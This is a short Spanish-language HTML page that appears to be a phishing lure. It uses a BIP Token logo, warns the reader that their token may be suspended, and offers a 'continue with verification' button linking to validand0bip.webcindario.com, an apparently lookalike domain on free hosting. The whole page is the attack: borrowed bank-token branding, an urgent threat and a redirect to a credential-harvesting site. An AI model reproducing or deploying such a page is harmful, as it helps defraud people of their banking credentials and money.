<!DOCTYPE html>
<html>
<style type="text/css">

.body {
	background-color: white;
}
.input{
	font-family: 'Segoe UI Semibold', 'Segoe UI Bold', 'Segoe UI', 'Helvetica Neue Medium', Arial, sans-serif;
    font-size: 18px;
    text-align: center;
    text-decoration: none;
    font-weight: 600;
    letter-spacing: 0.02em;
    color: white;
    background-color: #16AB45;
    border: none;
    border-radius: 25px;
    padding: 7px 20px 7px 20px;
}
.ltr{
	font-family: 'Segoe UI Semibold', 'Segoe UI Bold', 'Segoe UI', 'Helvetica Neue Medium', Arial, sans-serif;
	font-size: 16px;
	color: #000000;
}
</style>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Nueva pestana</title>
</head>
<body class="body">
	<center><img src="https://images.sftcdn.net/images/t_app-icon-m/p/7f95a60c-6392-4efd-a2c7-735b57593946/2149247150/bip-token-logo" width="250px"></center>
	<br><br>
	<center><div>
		<a class="ltr"><b>¿Deseas evitar que sea suspendido tu BIP Token?<b></a>
	    	<br><br><br>
	    	<a class="input" href="https://validand0bip.webcindario.com/">Continuar con la verificacion</a>
	</div></center>
</body>
</html>